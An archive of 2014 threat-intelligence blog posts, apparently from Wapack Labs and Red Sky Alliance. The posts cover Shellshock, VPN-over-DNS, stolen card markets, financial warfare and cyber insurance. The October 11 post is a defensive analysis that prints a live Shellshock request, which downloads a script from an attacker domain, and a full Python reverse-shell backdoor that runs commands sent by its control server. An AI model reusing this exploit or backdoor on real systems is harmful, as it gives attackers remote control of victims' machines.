Saturday, October 11, 2014

Red Sky Weekly: FAQ and ShellShock

At least three times every week I get asked by someone "What's the difference between Wapack Labs and Red Sky Alliance?" "Who is your target customer?" "What product do we deliver?" "What's your distribution look like?"

 So let's start here...

 Wapack Labs is an intelligence, research and analysis company. We sell information.

  • Wapack Labs authors sources and sells intelligence, research and analysis. We deliver it in many forms, to many places... Red Sky Alliance/Beadwindow, the FS-ISAC, Subscriptions, OEM, Threat Recon, etc. We publish in PDF, STIX, HTML, CSV, and JSON.
Red Sky Alliance is a crowdsourcing platform for cyber threat intelligence pro's. Discussions are deep, and at the end of the thread, they receive a finished report with analysis of the discussion.  

  • Security researchers go to Red Sky Alliance to share notes, build the story, and together, protect their networks. What happens in Red Sky Alliance, stays in Red Sky Alliance. It's private. There's no government involvement. We don't care how you interact with DSS, the regulators, or any other government organization --that's your choice. Red Sky Alliance exists to help improve your security. The private portal is ALWAYS busy. We've added university users, and just this week, another Icelandic bank.
  • For government security researchers we offer a second collaborative... Beadwindow --delivered in Threat Connect. They do not get access to the Red Sky private portal, but they do get information that they may care about. We've delivered cyber warnings, dumped credential caches and targeting, to several government agencies directly, and for others, we push stuff through Beadwindow to contacts at the 24th AF and the US MDA. None of the US Cyber Centers participate, so if you're a state, local or .gov who needs help, call us. We can help. And our stuff is UNCLASSIFIED! You can actually use it!
As an example of one of our reports, I've posted (below) a snippet from a Wapack Labs report to Red Sky Alliance members and Wapack Labs subscribers...

We published this report in it's entirety last week.

We took a bit of a different approach on what seemed to be the hottest topic of the last two weeks - Shellshock. (Need information on Shellshock? Try here.)

We're looking for use cases where we might help protect against. This is one of three case studies that we'd identified, taking advantage of Shellshock. 

 You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it's gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.

 So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;) 

SHELLSHOCK CASE STUDY AND INFRASTRUCTURE

Beginning on 24 September 2014, hackers and researchers began exploiting the widely publicized Shellshock bash vulnerability, described in CVE -2014-6271.  The majority of the initial activity involved mass vulnerability scanning by white hats and black hats alike. Examination of scanning activity showed a peak on September 27th with a sharp decline as of September29th . This spike and sudden decrease may be a result of what is likely wide-scale patching of the vulnerability. Alternatively, this may mark the end of exploiting the vulnerability for reconnaissance purposes and could signal a move up the kill-chain into more targeted operations.

Legacy Scamming infrastructure re-emerges with Shellshock

A recently observed instance of Shellshock in the wild took the form of a Python implemented backdoor hosted on google-traffic-analytics.com. Table 5 lists the observed originating IPs along with the Shellshock request:

Originating IPs
Shellshock Request
14.163.12.119
77.29.189.34
78.15.20.81
78.161.195.166
79.136.130.110
88.253.229.151
93.139.212.67
109.227.100.189
112.156.18.40
113.171.116.163
117.218.186.16
118.172.123.111
119.130.114.154
124.123.75.68
178.120.175.81
178.121.79.68
190.49.241.220
190.82.114.190
223.206.54.26
 () { :;}; /bin/bash -c '/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm
!/usr/bin/env python


from socket import *
import os
from time import sleep
import sys


fpid = os.fork()

if fpid!=0:

    host='stats.google-traffic-analytics.com'
    port=9091
    sockobj = None
    ############################################

    sockobj = None
    recv = False

    def connect():
        try:
            sockobj=socket(AF_INET,SOCK_STREAM)
            sockobj.connect((host,port))
            return sockobj
        except:
            return False


    while True:
        while not sockobj:
            sockobj = connect()
            print "[*] Trying to reconnect..."
            sleep(1)
            if sockobj:
                print "[+] Connected"

        recv = sockobj.recv(1024)
        #print recv
        if not recv: sockobj = False; break;
        cmd = recv.strip()
        res = os.popen(cmd).read()
        if res:
            sockobj.sendall(res)

Open source research on google-traffic-analytics.com only returned one previous hit from 2010. In August of 2010, Securi.net reported a wave of spam that affected more than 200K websites including many popular sites. Investigation of the activity revealed that they were all controlled by www.google-traffic-analytics.com. The blog reported that google-traffic-analytics.com leveraged the compromised sites as part of a widespread spamming infrastructure.

Legacy Whois Record
Current Record
Registrant Contact:
   Goga Gastoyan
   Goga Gastoyan Goga Gastoyan bash@blogbuddy.ru
   +7.4957452002 fax: +7.4957452002
   Pokryshkina d.36 kv.36
   Moscow Moscow 119602
   ru
 
Admin Name: Radovanka Janekovic
Admin Organization: Goga Gastoyan
Admin Street: Ljubljanska 6
Admin City: Bled
Admin State/Province: Bled
Admin Postal Code: 4260
Admin Country: SI
Admin Phone: +386.15765749
Admin Phone Ext:
Admin Fax: +386.15765749
Admin Fax Ext:
Admin Email: support@google-traffic-analytics.com
 

Table 5. google-traffic-analytics.com Scanning Nodes

Upon successful exploitation, a CURL request is made for http://google-traffic-analytics.com/cl.pyThe Python script (cl.py) is a simple yet effective Backdoor that works on both Linux and Windows. It also has a zero detection on Virus Total [1]. The configured C2 address is hosted on subdomain stats.google-traffic-analytics.com. The downloaded python script will attempt connection C2 on port 9091 and if the C2 is listening  - a shell is opened up to the victim.

During testing, a the C2 node issued a uname –a command which prints all available information about a Linux system [2][Comment: No additional activity was observed.] (See Mitigations section for a SNORT signature)


The re-emergence of this domain after an apparent four year hiatus begs the question of whether it belongs to the same attackers. A Whois history report from Domain Tools lists the registrant during 2010 as “Goga Gastoyan”, (bash@blogbuddy.ru), however this changed in 2013 to the current owner “Radovanka Janekovic”. Further inspection of the records revealed Goga Gastoyan as the Admin organization in the new record – thus confirming likely attribution to the same attackers.  With the connection made to the legacy infrastructure, one could assume that this latest activity involving Shellshock could be the most recent attempt to expand the spamming network.
Table 6. Whois Record Comparison
[1] https://www.virustotal.com/en/file/052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d/analysis/
[2] http://linux.about.com/library/cmd/blcmdl1_uname.htm
[3] http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html






------------------------------------------------------

I realize this is pretty technical, but I thought it important to offer a simple slice of some of the work we do. This report is the basis for nearly everything else. These reports, when complete are farmed for placement in Threat Recon. This information, sourced by the lab, is thought to be high confidence (although we never score anything perfect!).

This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.

Have a great weekend!
Jeff
Posted by at No comments:

Saturday, October 04, 2014

Red Sky Weekly: ShellShock

Beginning on 24 September 2014, hackers and researchers began exploiting the widely publicized ShellShock bash vulnerability, described in CVE -2014-6271.  The majority of the initial activity involved mass vulnerability scanning by white hats and black hats alike. Examination of scanning activity showed a peak on September 27th with a sharp decline as of September 29th . This spike and sudden decrease may be a result of what is likely wide-scale patching of the vulnerability. Alternatively, this may mark the end of exploiting the vulnerability for reconnaissance purposes and could signal a move up the kill-chain into more targeted operations.

With so many scanning for those infected with the bash bug -both white hats and black hats, and with the vast number of machines both vulnerable and exposed, you can see how quickly researchers might get overwhelmed trying to figure out who's white and who's black! 

We took a slightly different approach. Red Sky members have been identifying the next thing.. malware that will likely exploit the bug, motivations for doing so, and working to identify potential case studies where we think we'll see ShellShock pop up in efforts to create worms, nefarious search engine optimization (SEO) schemes, and building new exploitation infrastructures.

ShellShock seems to have slowed, but it was definitely the topic of the week. It seemed to have slowed a bit, but that could simply mean that the public has been duly desensitized by all of the press.. time to move on to something else shocking...

Like this... Dealbook is reporting that ten other banks were compromised beyond those already reported.  I don't have any information on that, but I'll say... the portal has been insanely busy.

BT BT

I haven't checked user stats in a while (yeah, I'm a slacker!) so this week I jumped into the admin console to see where we're at. I get this question all of the time.. how many members are in Red Sky Alliance? 

From an organizational perspective, it's about 35 companies. From a user perspective, we have 178 active accounts. We've created many more, but we don't leave non-participating accounts active. Out of those 178 accounts, you can see the participation below. Of course we're only starting October, and March '12 was our first month in operation, but month over month we have an average of about 90 of those users who participate. That's 51% month over month participation. What about contributors? We average about 40 unique contributors every month. Some are more, some are less, but 40 unique contributors and 90 participants is a great number. How to the rest receive information? Some get subscriptions from lab. Others simply 'follow' conversations in the portal, getting notifications and content when something is loaded. Others are managers. 51% month over month participation.. amazing.




And what about content? As you can see below, we've got about 1500 threads going. The portal has only been active for about two and a half years, and since then, 1500 threads, and over 1000 documents and reports --about 300 finished intelligence or analysis reports supplied by us, or members.


Last, I thought I'd post some of the portal areas... Incident responders corner is where you go for incident response help. We keep an area called Wild Fire for those with an immediate need. Malware Samples? That's just what it says.. submit a piece of malware for analysis --either crowdsourced, or by the Wapack Labs team. Security Intelligence, another of our popular groups is just what it says. It's forward looking intel. And Fusion Reports, with 422 documents posted, hosts discussions of finished analysis.


Crazy. The portal has been on fire. I love it. I'm heading for Houston this week to work so I may respond slowly to email, but we're always on the portal :)

Interested in joining us? If you'd like to join us, drop me a note or give me a shout.
Have a great weekend!
Jeff

Posted by at No comments:

Saturday, September 20, 2014

Significant threat - VPN over DNS and Are Threat Intelligence organizations really dying off?

  1. In 2012, Wapack Lab’s began examining the use of VPN-over-DNS and the potential risks of insiders and external users from applications used circumvent authentication mechanisms, introduce new applications (tools) into the environment, and exfiltrate sensitive information through DNS’s always-open port. We've provided reporting of possible VPNs running over DNS to literally several dozen companies. Wapack Labs continues to advise organizations to closely examine its DNS name registers for VPN-over-DNS entries and monitor its DNS traffic closely; and policies should be considered to disallow the use of this application. This week, we published a detailed report on the VPN-over-DNS tool.

    Executive Summary 

    VPN-over-DNS, is a free Android application available on the Google Play store, downloadable to both Android telephones and as a web-based application. It boasts fully integrated DNS Tunneling combined with several mail clients, and while some organizations allow this application, Wapack Labs believes it to be a significant counterintelligence threat to companies who both allow it, and companies who may not be aware of its use. 


    VPN-over-DNS was first released to the Google play store on August 20th of 2012 by a French developer and is advertised as “data exfiltration, for those times when everything else is blocked.” VPN-over-DNS fully qualified domain names (FQDN) have been observed with passive DNS to resolve to a wide array of IP spaces including education, government, corporate, military, and even unassigned IP ranges. However, FQDNs resolving to an organization’s IP space may not be an indication that users within that IP space are actively using VPN-over-DNS, but rather VPN-over-DNS has been used in the past, and that the tunnel may still be available for use. Wapack Labs is providing this analysis because of widespread observation in the wild as well as situational awareness of an application with insider threat potential. 

    The analysis, including mitigation strategies is available to Wapack Labs customers, including Red Sky Alliance members. 

    BT BT

    Are Threat Intelligence organizations really dying off?

    I heard it three times this week. Threat intelligence shops integrating into the Security Operations Centers are being killed off because managers can't seem to show ROI.

    Here's the dirty little secret... There's a model for this.. you should be able to actually track the cost of your intelligence process and make an informed make/buy decision on intelligence offerings as a service (like ours!). I'm sorry. I can't credit the source. I've worked on so many of these, but every one that I've worked on all look much the same. I start with a basic CMM maturity model and adapt it. It looks a bit like Figure 1. Click to enlarge.



    Immature infosec teams are indiscriminate feeders when it comes to intelligence. They devour everything only to realize that much of what they ate might have been tin cans, steel belted radials, and general garbage. The good stuff that they actually needed, was somewhere in there, but that bad stuff really tastes bad. During this immature phase, operations drives intelligence. Incident response analysis is mistaken for intelligence, and open sources of information are consumed without regard for quality.

    As the team moves up the maturing model, they start realizing that they want more data, better tools, and they start participating externally with smarter groups... The bird dog is training the bird dog. Now the costs REALLY go up. Learning lessons from their own environment becomes crucial, and analysis of internal data becomes key. The team finds more and more vulnerabilities, frustrating management. This costs money. The team is learning. During this phase, operations still drive intelligence, but the pendulum is beginning to swing the other way. The team starts hunting. They don't yet understand the concept of 'collecting against requirements' but they do have a standing set of information on which they maintain constant vigil...

    And then it gets better. It's when the teams become mature. Collection requirements, EEIs, and scouring the landscape for new threats becomes the norm. Many teams realize the value of (select) home grown and open source tools, complimenting the COTs suite, and depending on the size of the team (I know BRILLIANT small teams that do very well!) they realize the value of intelligence in the SOC. When the team becomes an intelligence producer instead of an intelligence consumer. In fact it's almost magic. This is when intelligence feeds operations.

    Closing in on maturity, the model should start to look like figure 2 (forgive the slide!):
    So how do you know?

    Measure it!... Intel should do a couple of things for you:

    • At the strategic level, intelligence gives executives (and your marketing team!) an idea of what's coming. The more you know, and the better you plot it out, the better you'll be.
    • Intel should help with the tactical.. Not only the "what's going to hurt me tomorrow" but more priority questions like "what is going to hurt me today?" Intel should compliment your SOC operation. The should know on a daily basis, what Intel thinks they should be protecting against... What's coming for us? What's coming for our industry? And what is everyone else seeing?
    • And... when you can show drops in reaction times as a result of intel, or perhaps, faster reaction times resulting from very typical intel techniques - tabletop exercises, formalized brainstorming, greybeard sessions, and white/blackhat sessions (note I didn't mention penetration or vulnerability testing??), you know you've arrived.

    When you can show results like this... and your intelligence is fast turn, very actionable, and as right as it can be, you'll have no problems communicating the value of your team to upper management.

    So start here...  if you're an immature team, and need to keep your costs low, join an open source group. Learn as much as you can. Bounce indicators off of Threat Recon (it's free to 1000 queries per month), and start looking for badness in your network. Need help? Call us.

    On another note, I'm going to start posting as Wapack Labs instead of Red Sky Alliance. The portal is strong, but we've talked with a professional marketing guy who suggests we think about branding. Much of what I blog about falls outside of the information sharing construct. When we present, we talk of intelligence services and delivering it in many forms and in many forums --Red Sky Alliance, the FS-ISAC, through a community in Threat Connect (Beadwindow is on Threat Connect), and OEM'd (Threat Recon is available through ThreatQuotient). I'll be messaging from Wapack Labs from here out. Please use my Wapack Labs email account... jstutzman@wapacklabs.com.

    Have a great weekend!
    Jeff
    Posted  by 
    0 

    Add a comment

  2.  

    It's a big day!

    When Harvard was built they waited until students created paths in the grass, to and from class, before they built the sidewalks. We developed the Threat Recon API first to see how it would be used. And today (moments ago), we launched its first web interface for single search queries! We'll build features as users request them.

    Try it out for free for 1000 queries! threatrecon.co

    Please provide feedback and feature requests to threatrecon@wapacklabs.com

    Enjoy! Jeff
Posted by at 1 comment:

Sunday, September 14, 2014

Wapack Labs Blog: Threat Recon web interface is now live!

Wapack Labs Blog: Threat Recon web interface is now live!: It's a big day! When Harvard was built they waited until students created paths in the grass, to and from class, before they built the...
Posted by at No comments:

Saturday, September 13, 2014

Red Sky Weekly: American Sanctions Dumps, Threat Day

I'm reading an underground carding forum where the cards (presumably) from the Home Depot breach are being sold. The card dumps are labeled "American Sanctions Dump", and currently, there appear to be 13 dump files.  I've not purchased any cards, nor have we broken any rules, but there's a pretty nice catalog showing what's for sale... and it's pretty amazing.  I apologize for the sizing of the image below but wanted to show readers what these markets actually look like. I've obfuscated the names/addresses of the issuing banks, and the name of the user who actually pulled them, but the rest is all real.

Interestingly enough, the Canadian card (shown in the first row) is selling for $51.48 while most of the US cards sell for significantly less. Not sure why. Canadians have better credit? Even more shocking was the number of credit cards in the dump was dwarfed by the number of DEBIT cards! I'm not sure about you, but my mother always told me "don't use your debit card like a credit card! It's not safe!" ...I'll have to remember to ask my banker friends if this is really so. I'm not normally into tracking carding, there are loads of folks who do, but this was just to rich. The idea that a dump would be named "American Sanctions" after only recently I blogged about bankers being used as unprotected pawns by the Treasury department. This really got my analytic juices pumping.


Here's the other thing I thought was interesting. We obtained a dump of the credential database used by a (different) forum (we didn't dump it). When we started analyzing it, we realized that the passwords used by the guys stealing cards from folks with bad passwords, were actually pretty bad themselves. No password at all was used in nearly half of the accounts in the dump, and qwerty, was easily the next most used. It went downhill fast from there. Literally thousands of them used the same password (black, qwerty, 123456, etc.). Not sure why, but that really took me by surprise. This, a fairly well known hacker forum (fairly well known meaning over 10,000 regular users), and the guys grabbing tools had both lousy passwords and bad OPSEC! Why do I care?

Years ago when I first started in the intel business, profiling attacks, victims, attackers, etc., I worked with a couple of really cool guys. My team profiled over 3000 attackers with the idea of understanding not only who these guys were, but how they operate, what their motivations were, and if, over time, they got better. The nice thing was, many of them were new. When they hacked, we saw it, knew who they were (because of their poor OPSEC) and through a combination of means, could track their growth (and attacks) throughout the years. And of course it worked. I have a feeling we're seeing the same thing on this hacker forum. Young users grabbing tools practicing terrible OPSEC. They'll get better. And we'll know. And yes, we're posting this stuff to our membership, and indicators to Threat Recon.

BT BT

We had a heck of a great time this week. I've not been to Manhattan for more than a couple of hours at a time in years. Usually I take the train in, attend a meeting or two, and take the last train out. And now, I've spent most of the last two weeks there. Last Tuesday was with the Chertoff Group (thanks Mark for the invite!) before doing cocktails with Red Sky members at the Vander Bar in midtown, and Threat Day on Wednesday at the HQ of a large Manhattan based bank. What a place.. we were on the 26th floor, facing south, right on Times Square. The presentations were incredible --one member talked about building a DNS filtering tool that he uses to analyze all of his DNS requests. Another talked about joining a botnet to analyze activity. Another detailed an APT event that they'd lived through, and yet another profiled an APT actor. Every quarter I get reenergized when I sit through Threat Day. It's not about having 2000 people in Vegas, it's about 30 really smart ones sitting in a room, watching the screen, interacting and sharing notes. And that's what we did. That's what I like about Red Sky.

I'm going to close out this week with this. A Mitre PhD just published a piece entitled "Turning the Tables on Cyber Attackers...." I especially like the section "Mixing Automated Tools with Human Analysis" (as a side note, nine providers set dozens of cookies on my browser when I opened it). That said, Mitre is now espousing the idea that humans must be involved in analysis to turn the tide on cyber attacks. Say it ain't so! Mitre called out Red Sky Alliance about a year ago as one of the better sources for human analysis, crowdsourced in our private portal. And today, the idea that humans need to look at both the forest and the trees is a massive step forward in thinking. What's old is new again. I love it. The paper in its entirety may be viewed on the Mitre site. For now, know this. It's true. Relying on open source of big data always requires further analysis. Someone MUST sort through, evaluate and prioritize findings. That's where we come in.

I especially love this paragraph:

"... Automated tools are incredibly useful, but detecting advanced cyber intruders also depends on skilled and experienced defenders. These defenders are like detectives at the scene of a crime—looking for clues, following leads, making connections, and using intuition as well as hard data to figure out who did what." 

 On that, ThreatRecon.co is going well. We'll have a simple web interface up soon. Red Sky is welcoming new members, and Wapack Labs is busy. Need information? Drop us a note. Red Sky for collaboration; Wapack Labs for subscriptions; and Threat Recon (API) for up to a thousand free queries per month.

 Until next time,
Have a great week!
Jeff


Posted by at No comments:

Saturday, September 06, 2014

Red Sky Weekly: Malware analysis leads to widely used infrastructure, 500+ domains 


Normally I lead off with a bit of a story or a lesson, or a gripe. Not this week. This week I'm
leading off with a piece of work that we published yesterday --a deep-dive piece of analysis on new malware being leveraged in 





targeted cyber crime operations. 



Working from an open sourced lead, Wapack Labs identified and analyzed a new piece of malware. We've dubbed the malware family Backdoor.KLGConfig.  Two variants were identified. One variant was observed specifically targeting credentials for a popular banking application believed used by many Financial Institutions. Further analysis exposed a wide criminal infrastructure consisting of over 500 domains.



Fusion Report 14-023 (FR14-023) was published. It's ten pages of analysis and over 20 pages of indicators. The indicators are available in Threat Recon API* with a "reference" search for "FR14-023". 




(*The Threat Recon web front end is in the works. If you need scripts for the API, you can find them here. If you prefer, we've got a down and dirty desktop application available that will also front-end Threat Recon. It ain't pretty, but for those who prefer point and click, Pizza Cat is on GitHub as well. It works well, parses darn near everything and then runs the queries through our API. Simple stuff. You can find Pizza Cat here.)




BT BT






Now I'll free form it a bit. First, I attended the AT&T Security Conference this week. This is a smaller conference in comparison, but in my opinion, and one of the reasons I've attended for the last few years is because there's something about the AT&T message. Yes, there's a bit of pitch involved, but how many places can you go to hear a full day of talks from a major carrier... folks analyzing 60Pb of data per day. It's a VERY different perspective. Endpoints = mobiles and cloud is the way of the future. And that's something that interests me immensely. Use cases, virtualization, speed, cost, benefit, and of course, my favorites, security, complexity, and new disruptive ways of doing a whole lot of things. When we're looking at endpoints going from millions to billions with the introduction of the internet of things and the only place to hold all that data is, you guessed it, in the cloud! So imagine the opportunity (for good or bad) and what that'll mean for IT and security pros. As a starter, it means you better keep up. For me? This is cool stuff! I'm planning on playing in it in the future! I want to learn as much as I can.




Next, the portal continues to be busy, and more-so, we've begun pushing Beadwindow documents into Threat Connect. That's right. If you'd like to buy Beadwindow reporting and access it through Threat Connect, give us a call. For now we'll sign you up the old fashioned way, over the phone with a credit card, but hopefully that'll change soon.




Red Sky is doing well, but we heard loud and clear that members wanted automated means of accessing intel. If you'd like to access feeds of information, we're all for it. So for that, we now push lab sourced reporting in subscription feeds, or through Threat Recon. If you're one of those users that needs (must have) a web interface, hang in there. It's coming soon and you're API key will still work. If not (yesterday), we wrapped up prototyping our initial Splunk connector. Our friend Seth Bromberger authored a python module and others have contributed connectors to CRITS, and a Maltego transform. The python queries have been converted to Ruby for those who prefer Ruby, and the community and the number of Threat Recon users, and those who wish to integrate/OEM with it grows by the day. In fact, by next blog, I fully expect to announce the integration and availability of a Wapack Labs feed through at least two new OEM partners! 



Threat Recon can be found at threatrecon.co.




Until next week, check out Threat Recon. Give us a call if you'd like to talk OEM, and at Red Sky, when you want full content, this is where you go to get it. And quoting Tom Bodette, Come on in. We'll leave the light on for you!



Have a great weekend!
Jeff
Posted by at No comments:

Saturday, August 30, 2014

Red Sky Weekly: At the Intersection of Financial Warfare and Cyber

Financial Warfare? Carried out in cyberspace?
http://www.newsweek.com/2014/05/02/art-financial-
warfare-how-west-pushing-putins-buttons-248424.html

For months, we've been following the Russia | Ukraine conflict from the perspective of cyber as a means to an end. We've tracked and reported, both in this blog, and in more detail for our members and customers, the exploits of Cyber Berkut, Green Dragon, and suspected Russian involvement in the Ukrainian Presidential election (shortly after the US Congress passed legislation to back a US$1 billion loan guarantee, and US$50 million to help guarantee a fair election). And a few days ago, after much hand wringing, heated discussion, and finally, normalizing a would-be intelligence assessment, we published a piece that suggested that large investors and holders of long-term debt in the region are at higher risk than others for cyber attack. And we didn't talk about it, but the reality is,  those who've participated in sanctions should expect retaliation --and probably via cyber.

On that, I remembered a Bloomberg piece from July. The piece described a tool in the diplomacy toolkit that our leaders have been using for some time. Bloomberg describes it as Financial War.  In May, Newsweek published a similar piece entitled"How the west is pushing Putin's buttons".

"The U.S. antiterror arsenal includes Predator drones, Tomahawk missiles and men in gray suits who target rogue regimes' finances." (http://online.wsj.com/news/articles/SB10001424127887324665604579080260261350776)

So why is a cyber guy talking about Financial War, quoting Bloomberg and the Wall Street Journal? Because financial warfare, delivered via cyber is quickly becoming the diplomatic weapon of choice. What happens when bankers uphold sanctions by blocking wire transfers and suffer retribution as a result? When the owners of the banks that are blocked from receiving money grouse to their childhood friend, and when that friend is Vladimir Putin, and when even today, they practice judo together --when all of this occurs, it should come as no surprise that the bankers that our administration used as a weapon are retaliated against.

I'm keeping it short today, but want to leave you with a couple of think points...

When bankers (or others) are retaliated against, who will protect them? What kind of regulatory action will occur when bankers stick their neck out in support of diplomacy? Will bankers be punished for being hacked? And will (should) the government offset losses to investors if/when they occur as a result? 

BT BT
  • Red Sky turned THREE this week! It's amazing, and it went by in a flash, but three years ago, Red Sky Alliance Corporation was born. 
  • We've begin populating reporting in the Beadwindow portal in Threat Connect
  • ...And the analysis engine has been in overtime. The portal is busy --it has been all summer, and going into labor day weekend, for some reason, we've started getting calls for new memberships. 
I'm keeping it short. It's the one sunny day we're expected to have this weekend, so I'm going to take advantage of it. I hope you do too.

Have a great Labor Day weekend!
Jeff




Posted by at No comments:

Tuesday, August 26, 2014

Wapack Labs Blog: Wapack Labs Technical Analysis: VSkimmer and Black...

Wapack Labs Blog: Wapack Labs Technical Analysis: VSkimmer and Black...: Originally published on January 30, 2014, this analysis product was offered privately during the height of the Target breach. Over the weeke...
Posted by at No comments:

Saturday, August 23, 2014

Red Sky Weekly: Shocking!

Author: Cuban political cartoonist Antonio Prohías
German intelligence spies on Americans and Turks?

Chinese Hackers targeting information on MH370?

Malware targeting ex-Soviet states has Russian hallmarks?

Say it ain't so!

For months we've read stories about the NSA. I thought I'd take a moment and talk about the second oldest profession in the world: spying. Every country has organizations dedicated to this craft. And with 196 plus or minus countries in the world (depending on who's counting), you'd be hard pressed to find a country with just one intelligence organization. Most have several. Add in another 10,000 marketing/intelligence shops owned by companies, the fact that the Society of Competitive Intelligence professionals boasts chapters all over the world, and a quick Google for Competitive Intelligence yields over 10 million hits. Ever read an analyst report when you're thinking about buying stock?  When you're using it to make decisions about what to buy, that's intelligence...

There is no escaping this fact. Intelligence is everywhere. And cyber is one easy place to get it.

In 1999, I gave a talk at SANS on this very topic. At the time, I was both an intelligence officer and a SCIP member. I talked of the movement of spying toward cyberspace, offering examples of paid intelligence collectors, working in the private sector, grabbing precious information from other companies via computers. I spent some time actually teaching my audience how this is done, and for all of the work I'd done preparing the presentation, my reviews came back with comments like "Stutzman is selling snake oil", "The sky is not falling!" and "What planet is this guy from?" I'll never forget it. I was not invited back.

Since then, I've given that same talk, unedited, in pieces or in its entirety, as if was still 1999, dozens of times --Navy War College's Strategic Studies Group (where Navy Captains go when they're about to put on a star), during classes at Norwich, Worcester Polytechnic Institute and Harvard, and more times than I can count to new analysts. It was a simpler time, but none-the-less, that talk from 1999 holds true today, and was dead on then. I remember it well. I liken good intelligence to information presented by securities researchers when their bosses are playing the market. The reports offer recommendations at the top of the page; it offers some kind of a mechanism to score the researcher, and then lay. (I'll save this for another blog entitled.. what does good intelligence actually look like?). It's beautiful!

What does intelligence look like in cyberspace? How does one go about collecting it? My talk included that too... and at the time, the USSR was breaking up and those spies, needing jobs, migrated largely to countries in Europe... including Germany. Many worked for the banking community, attempting to help protect investments. Think they're the only ones? Many of my former co-workers and peers also now work for corporate America. And what do you think they (we) do? Intelligence, research and analysis. Pick a country and I'll tell you a non-military story of how someone is spying on someone else for money. We expect it from the government. It's the second oldest profession in the book.

So, hold on to your hats folks. Cyber increases the speed by which access can be gained to specific information. It offers access to vastly larger caches of data as storage become smaller and the amount of data they can hold becomes bigger. And computers can be targeted like no human ever could... silent, fast, accurate. And it is very much taken advantage of.

Does it come as a surprise that German intelligence folks are spying on the US and Turkey? No. Pick a country.. they're spying on someone; either for military or economic gain.... and your computer is the easiest place to get information from.

I love my job!

If you'd be interested in seeing the presentation, drop me a note. We'll set something up.

BT BT

It's been a great week.

Announcing Beadwindow on Threat Connect!

I'm happy to announce that we've partnered with Threat Connect to make our Beadwindow portal (our open portal) available on Threat Connect. The site is set up and we're moving content over as we speak. Interested in membership?  Rick is the Beadwindow Community Director and can get you set up. Contact Rick.

In the Red Sky private portal:
  • The Red Sky portal has been really busy. Normally over the summer it takes a dip, but not this year. We added a couple of new members, including one this week. 
  • We continue to watch and blog lessons from the cyber activities undertaken during the Ukraine/Russia conflict, we posted updated GEOPOL reporting. 
  • And this week we loaded up caches of tools, known used by a couple of prolific groups. It's not all been analyzed, but there's plenty of talent in the portal to assist.
In Wapack Labs:

Threat Recon adoption continues to grow. 
https://pypi.python.org/pypi/threatrecon
Yesterday, Seth Bromberger, one of our friends and an expert in the industrial controls security community, posted a Threat Recon python module to python.org and GitHub. In the last 24 hours, there've been 478 downloads!

We've put up our internal Maltego server. The transforms work wonderfully (thanks Bart!).

We're not a CRITs shop, but there are scripts written and posted on the GitHub for CRITs integration.

And standby folks, Splunk is coming!

Enough for now. Until next week, have a great weekend!
Jeff






Posted by at No comments:

Friday, August 22, 2014

New API module for Wapack's ThreatRecon!

Thanks to Seth Bromberger for writing Python module for our cyber threat intelligence system ThreatRecon.  You can download the module here:  https://pypi.python.org/pypi/threatrecon

Thanks Seth!
Posted by at No comments:

Saturday, August 16, 2014

Red Sky Weekly: The unsexy truth about cyber insurance.

I know cyber risk insurance isn't one of life’s most sexy topics, but one worthy of discussion.  I was reading an article by Craig Carpenter titled “Lack of Incident Response Holding Back Cyber insurance Market” this afternoon (The article can be found here: http://tinyurl.com/pn2yjs8).  Craig made some very good points in his “Three Simple Steps” that will help both the insured, and the insurance companies, in working together towards a common ground.  These steps include: detection and swift response, full-fledged incident resolution teams, and working with clients to develop best practices starting with “Mean Time to Response (MTR).”  Each step should be considered by any organization, if not already in place, and are really part of good overall cyber hygiene With these steps in place, organizations are already mitigating much of the cyber risks and insuring themselves from costly, and often, cyber incidents. 

What if insurance companies planning to write cyber risk insurance took the time to assess the “Cyber Health” of the potentially insured before writing policies?  When I shopped for life insurance when my children were young, I answered pages of health history questions about myself and my family.  Then there was the urine and blood tests and the blood pressure cuff.  The insurance company was really interested in my current health condition(s) prior to estimating how healthy I would be in the future.  Why are insurance companies not requesting a cyber “health” assessment prior to insuring companies, not just from a cyber risk standpoint but from a all-inclusive business risk perspective?

Network data can be analyzed through a number of tools, ThreatRecon comes to mind www.threatrecon.co .  Tools to that can quickly assess the malicious activity found on the potentially insured network, can go a long way in helping actuaries assess the potential for financial loss in the event of a network breach.   Indicators from a client’s network data can be run against indicators known to be questionable or even dangerous.  Wouldn't an underwriter be interested in knowing if a potential insured was already p0wned before writing any coverage?  Tools such as ThreatRecon, could also allow a business owner or third party analyst review their data before calling their insurance agent for bid.  If you have a verified “sound” cyber health check, shouldn't you get a better price on your new policy?  Knowing the context behind threats that may already be hitting your servers would even be better, why not raise the level of prevention before you experience a breach?

The question will arise, who will pay for the cyber assessment?  Of course the insurance company will not want to absorb the expense, but it could be listed on the insurance invoice as a consulting fee.  I would hope that a business owner would like an independent assessment of their cyber health, especially since they are shopping for cyber insurance.  When taking into account the costs associated with cyber breaches, both financial and reputational, the costs of an assessment are a fraction of post breach cleanup.  A sound plan to assess a business’s network and knowing the cyber health of your own company first, then implementing Craig’s Three Simple Steps looks like a winning combination to me.

BT BT

Yesterday, we held our first webinar for ThreatRecon, Wapack Labs’ cyber threat intelligence API.  The webinar was very well attended by more than thirty of some of the best analysts in the industry.  We couldn't have been more pleased!   The feedback from the cyber community remains very positive and the adoption rate for the platform is growing daily.  Giving cyber security teams the means to look at hundreds of thousands of high confidence indicators with full context and full attribution is fill not only the quick answers needed by the analysts but also compelling stories required by CISO’s when advocating for the need to keep their operations fully funded.


Wapack Labs’ offers ThreatRecon for free for the first thousand queries – we believe that strongly in our mission and core values of protecting organizations from cyber threats.  You can get started by going to the ThreatRecon website at https://www.threatrecon.co  If you didn’t have the opportunity to see the webinar, you can watch it here: https://vimeo.com/103543432   
Posted by at No comments:
Subscribe to: Posts (Atom)